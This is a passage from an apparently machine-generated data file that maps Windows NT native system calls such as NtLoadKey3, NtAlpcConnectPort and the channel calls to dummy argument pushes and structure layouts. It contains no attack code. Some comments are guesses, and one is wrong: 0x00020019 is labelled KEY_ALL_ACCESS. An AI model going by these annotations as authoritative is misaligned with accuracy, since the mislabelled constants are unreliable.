None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE DebugHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct113\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x0000000000000000\",\r\n \"fieldComment\": \"None for infinite wait\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtLoadKey3\": {\r\n \"ntFunc\": \"NtLoadKey3\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG Unknown (example nonzero value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE KeyHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00020019\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (KEY_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ULONG LoadArgumentCount (example: 2 arguments)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to LoadArguments (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xdeadbeef\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG Flags (default 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES FileObjectAttributes (dummy pointer, commonly None)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct114\",\r\n \"structureValueExpectations\": \"File object attributes, commonly None.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES KeyObjectAttributes (dummy pointer, commonly None)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct115\",\r\n \"structureValueExpectations\": \"Key object attributes, commonly None.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct114\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No attributes\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n },\r\n \"struct115\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No attributes\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAlpcConnectPort\": {\r\n \"ntFunc\": \"NtAlpcConnectPort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER Time_Out (dummy pointer, commonly None)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct116\",\r\n \"structureValueExpectations\": \"Timeout interval in 100-nanosecond units, or None for infinite.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to ALPC_MESSAGE_ATTRIBUTES __INMessageAttributes (dummy pointer, commonly None)\",\r\n \"structurePointer\": \"ALPC_MESSAGE_ATTRIBUTES\",\r\n \"structureRef\": \"struct117\",\r\n \"structureValueExpectations\": \"Input message attributes, commonly None.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to ALPC_MESSAGE_ATTRIBUTES __OUTMessageAttributes (dummy pointer, commonly None)\",\r\n \"structurePointer\": \"ALPC_MESSAGE_ATTRIBUTES\",\r\n \"structureRef\": \"struct118\",\r\n \"structureValueExpectations\": \"Output message attributes, commonly None.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to ULONG BufferLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000400\"\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to PORT_MESSAGE ConnectionMessage (dummy pointer)\",\r\n \"structurePointer\": \"PORT_MESSAGE\",\r\n \"structureRef\": \"struct119\",\r\n \"structureValueExpectations\": \"Connection message structure.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00a0\",\r\n \"additionalComment\": \"Pointer to SID RequiredServerSid (dummy pointer, commonly None)\",\r\n \"structurePointer\": \"SID\",\r\n \"structureRef\": \"struct120\",\r\n \"structureValueExpectations\": \"Required server SID, commonly None.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG Flags (example: ALPC_CONNECTFLAG_SYNC_CONNECTION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00b0\",\r\n \"additionalComment\": \"Pointer to ALPC_PORT_ATTRIBUTES PortAttributes (dummy pointer)\",\r\n \"structurePointer\": \"ALPC_PORT_ATTRIBUTES\",\r\n \"structureRef\": \"struct121\",\r\n \"structureValueExpectations\": \"Port attributes structure.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00c0\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES ObjectAttributes (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct122\",\r\n \"structureValueExpectations\": \"Object attributes for the port.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00d0\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING PortName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct123\",\r\n \"structureValueExpectations\": \"Name of the ALPC port.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00e0\",\r\n \"additionalComment\": \"Pointer to HANDLE PortHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct116\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x0000000000000000\",\r\n \"fieldComment\": \"None for infinite wait\"\r\n }\r\n ]\r\n },\r\n \"struct117\": {\r\n \"type\": \"ALPC_MESSAGE_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"AllocatedAttributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No attributes\"\r\n },\r\n {\r\n \"fieldName\": \"ValidAttributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No valid attributes\"\r\n }\r\n ]\r\n },\r\n \"struct118\": {\r\n \"type\": \"ALPC_MESSAGE_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"AllocatedAttributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No attributes\"\r\n },\r\n {\r\n \"fieldName\": \"ValidAttributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No valid attributes\"\r\n }\r\n ]\r\n },\r\n \"struct119\": {\r\n \"type\": \"PORT_MESSAGE\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"u1.Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0040\",\r\n \"fieldComment\": \"Message length\"\r\n },\r\n {\r\n \"fieldName\": \"u1.ZeroInit\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"Zero initialized\"\r\n },\r\n {\r\n \"fieldName\": \"u2.Type\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0001\",\r\n \"fieldComment\": \"Message type\"\r\n },\r\n {\r\n \"fieldName\": \"u2.DataInfoOffset\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"No data info\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId.UniqueProcess\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x99994444\",\r\n \"fieldComment\": \"Dummy process ID\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId.UniqueThread\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Dummy thread ID\"\r\n },\r\n {\r\n \"fieldName\": \"MessageId\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Message ID\"\r\n },\r\n {\r\n \"fieldName\": \"ClientViewSize\",\r\n \"fieldType\": \"SIZE_T\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No client view\"\r\n }\r\n ]\r\n },\r\n \"struct120\": {\r\n \"type\": \"SID\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Revision\",\r\n \"fieldType\": \"BYTE\",\r\n \"fieldValue\": \"0x01\",\r\n \"fieldComment\": \"SID revision\"\r\n },\r\n {\r\n \"fieldName\": \"SubAuthorityCount\",\r\n \"fieldType\": \"BYTE\",\r\n \"fieldValue\": \"0x01\",\r\n \"fieldComment\": \"One subauthority\"\r\n },\r\n {\r\n \"fieldName\": \"IdentifierAuthority\",\r\n \"fieldType\": \"BYTE[6]\",\r\n \"fieldValue\": \"0x000000000005\",\r\n \"fieldComment\": \"NT Authority\"\r\n },\r\n {\r\n \"fieldName\": \"SubAuthority[0]\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000020\",\r\n \"fieldComment\": \"Example subauthority\"\r\n }\r\n ]\r\n },\r\n \"struct121\": {\r\n \"type\": \"ALPC_PORT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Flags\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"ALPC_PORTFLG_ALLOW_LPC_REQUESTS\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQos.Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x0000000C\",\r\n \"fieldComment\": \"SECURITY_QUALITY_OF_SERVICE size\"\r\n },\r\n {\r\n \"fieldName\": \"MaxMessageLength\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00001000\",\r\n \"fieldComment\": \"4KB max message\"\r\n },\r\n {\r\n \"fieldName\": \"MemoryBandwidth\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Default\"\r\n },\r\n {\r\n \"fieldName\": \"MaxPoolUsage\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Default\"\r\n },\r\n {\r\n \"fieldName\": \"MaxSectionSize\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Default\"\r\n },\r\n {\r\n \"fieldName\": \"MaxViewSize\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Default\"\r\n },\r\n {\r\n \"fieldName\": \"MaxTotalSectionSize\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Default\"\r\n }\r\n ]\r\n },\r\n \"struct122\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd0110\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n },\r\n \"struct123\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"String length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0022\",\r\n \"fieldComment\": \"Buffer size in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0120\",\r\n \"fieldComment\": \"Pointer to string buffer (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCancelDeviceWakeupRequest\": {\r\n \"ntFunc\": \"NtCancelDeviceWakeupRequest\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE Device (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateChannel\": {\r\n \"ntFunc\": \"NtCreateChannel\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd00f0\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES ObjectAttributes (dummy pointer, commonly None)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct124\",\r\n \"structureValueExpectations\": \"Object attributes for the channel, commonly None.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0100\",\r\n \"additionalComment\": \"Pointer to HANDLE ChannelHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct124\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No attributes\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtFreeUserPhysicalPages\": {\r\n \"ntFunc\": \"NtFreeUserPhysicalPages\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG UserPfnArray (dummy pointer, array of page frame numbers)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00123456\"\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to ULONG NumberOfPages (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtGetPlugPlayEvent\": {\r\n \"ntFunc\": \"NtGetPlugPlayEvent\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"EventBufferLength (4096 bytes typical buffer size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to PLUGPLAY_EVENT_BLOCK PnPEvent (dummy pointer)\",\r\n \"structurePointer\": \"PLUGPLAY_EVENT_BLOCK\",\r\n \"structureRef\": \"struct125\",\r\n \"structureValueExpectations\": \"Event GUID, event category, and event-specific data.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PnPContext (None, typical for no context)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PnPApcRoutine (None, no APC routine)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct125\": {\r\n \"type\": \"PLUGPLAY_EVENT_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"EventGuid\",\r\n \"fieldType\": \"GUID\",\r\n \"fieldValue\": \"0xdeadbeef-0000-0000-0000-000000000001\",\r\n \"fieldComment\": \"Sample event GUID\"\r\n },\r\n {\r\n \"fieldName\": \"EventCategory\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000002\",\r\n \"fieldComment\": \"Hardware profile change event\"\r\n },\r\n {\r\n \"fieldName\": \"Result\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No result\"\r\n },\r\n {\r\n \"fieldName\": \"Flags\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Flag set\"\r\n },\r\n {\r\n \"fieldName\": \"TotalSize\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"64 bytes\"\r\n },\r\n {\r\n \"fieldName\": \"DeviceObject\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtOpenChannel\": {\r\n \"ntFunc\": \"NtOpenChannel\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct126\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to HANDLE ChannelHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct126\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (no name)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtReplyWaitSendChannel\": {\r\n \"ntFunc\": \"NtReplyWaitSendChannel\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to CHANNEL_MESSAGE (dummy pointer)\",\r\n \"structurePointer\": \"CHANNEL_MESSAGE\",\r\n \"structureRef\": \"struct127\",\r\n \"structureValueExpectations\": \"Message header and data fields.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000040\",\r\n \"additionalComment\": \"Length (64 bytes, typical message size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to message text buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x41414141\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct127\": {\r\n \"type\": \"CHANNEL_MESSAGE\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"MessageType\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Request message\"\r\n },\r\n {\r\n \"fieldName\": \"DataLength\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000020\",\r\n \"fieldComment\": \"32 bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Data\",\r\n \"fieldType\": \"BYTE[32]\",\r\n \"fieldValue\": \"0x41424344\",\r\n \"fieldComment\": \"Sample data\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtSendWaitReplyChannel\": {\r\n \"ntFunc\": \"NtSendWaitReplyChannel\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to CHANNEL_MESSAGE (dummy pointer)\",\r\n \"structurePointer\": \"CHANNEL_MESSAGE\",\r\n \"structureRef\": \"struct128\",\r\n \"structureValueExpectations\": \"Message header and data fields.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000040\",\r\n \"additionalComment\": \"Length (64 bytes, typical message size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to message text buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x42424242\"\r\n },\r\n {\r\n \"value\": \"0x00000555\",\r\n \"additionalComment\": \"HANDLE ChannelHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct128\": {\r\n \"type\": \"CHANNEL_MESSAGE\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"MessageType\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000002\",\r\n \"fieldComment\": \"Reply message\"\r\n },\r\n {\r\n \"fieldName\": \"DataLength\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000020\",\r\n \"fieldComment\": \"32 bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Data\",\r\n \"fieldType\": \"BYTE[32]\",\r\n \"fieldValue\": \"0x44434241\",\r\n \"fieldComment\": \"Sample data\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtSetContextChannel\": {\r\n \"ntFunc\": \"NtSetContextChannel\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None Context pointer (no context provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtRequestDeviceWakeup\": {\r\n \"ntFunc\": \"NtRequestDeviceWakeup\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None Device handle (no device specified)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n 